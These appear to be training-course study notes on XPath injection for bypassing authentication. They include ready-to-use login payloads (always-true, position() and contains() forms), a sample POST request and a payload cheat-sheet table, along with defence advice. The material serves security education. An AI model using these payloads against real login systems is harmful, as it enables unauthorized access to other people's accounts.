XPath Injection - Authentication Bypass

Key Concepts

1. What is XPath?

   • XPath is a query language for selecting nodes from an XML document.

   • It is often used in web applications for data retrieval and authentication mechanisms.

2. What is XPath Injection?

   • An attack technique where an attacker manipulates user input to alter the structure of an XPath query, bypassing authentication or gaining unauthorized access.

---

XPath Query Example

Consider the following XML user data:

xmlCopyEdit<users>
  <user>
    <username>htb-stdnt</username>
    <password>Academy_student!</password>
  </user>
  <user>
    <username>admin</username>
    <password>admin</password>
  </user>
</users>

Authentication might use the following query:

xpathCopyEdit/users/user[username/text()='USERNAME' and password/text()='PASSWORD']

If user input is unsanitized, injection becomes possible.

---

Common Payloads

1. Universal True (Bypass Authentication):

   ' or '1'='1

   Resulting Query:

   /users/user[username/text()='' or '1'='1' and password/text()='']

2. Target a Specific User (Admin):

   admin' or '1'='1

   Resulting Query:

   /users/user[username/text()='admin' or '1'='1' and password/text()='irrelevant']

3. Use Position-Based Targeting:

   ' or position()=2 or '

Change the 2 to an 3 to Pivot to different account

' or position()=3 or '

1. Resulting Query:

   /users/user[username/text()='' or position()=2 or '' and password/text()='irrelevant']

   • This targets the second user in the XML file (e.g., admin).

2. Substring Matching:

   ' or contains(.,'admin') or '

   Resulting Query:

   /users/user[username/text()='' or contains(.,'admin') or '' and password/text()='irrelevant']

   • Searches for any user with "admin" in their username or other fields.

---

Steps to Exploit

1. Analyze Application Behavior:

   • Understand how usernames and passwords are processed (e.g., via POST requests, cookies, etc.).

2. Test for Injection Points:

   • Inject payloads into the username or password fields to observe server responses.

3. Craft Payloads:

   • Use payloads like position() or contains() to refine your query targeting.

4. Privilege Escalation:

   • Use payloads to access specific accounts or enumerate users until the desired privileges are obtained.

---

Practical Exploitation Example

Payload to Target Admin (Second User):

username=' or position()=2 or '&password=irrelevant

Response Example:

• Successfully logged in as WELCOME SUPERUSER!.

---

Defense Measures

1. Sanitize Inputs:

   • Use proper input validation and encoding to prevent injection.

   • Reject special characters like ', ", [, and ].

2. Parameterized Queries:

   • Avoid dynamically building XPath queries. Use parameterized XPath APIs:

     $query = "/users/user[username/text()=$username and password/text()=$password]";

3. Hash Passwords:

   • Ensure passwords are hashed before storage and comparison.

4. Error Messages:

   • Avoid detailed error messages that reveal query structures.

---

Key Takeaways

• XPath Injection is similar to SQL Injection but targets XML queries.

• Functions like position() and contains() can help refine targeting in complex scenarios.

• Proper sanitization and secure coding practices are essential to mitigate these attacks.

---

Payloads to Remember

Scenario	Payload	Result
Bypass Authentication	' or '1'='1	Logs in as the first user.
Target Specific User (e.g., Admin)	admin' or '1'='1	Logs in as admin.
Position-Based User Targeting	' or position()=2 or '	Logs in as the second user.
Substring Matching (Admin)	' or contains(.,'admin') or '	Finds users with "admin" in username.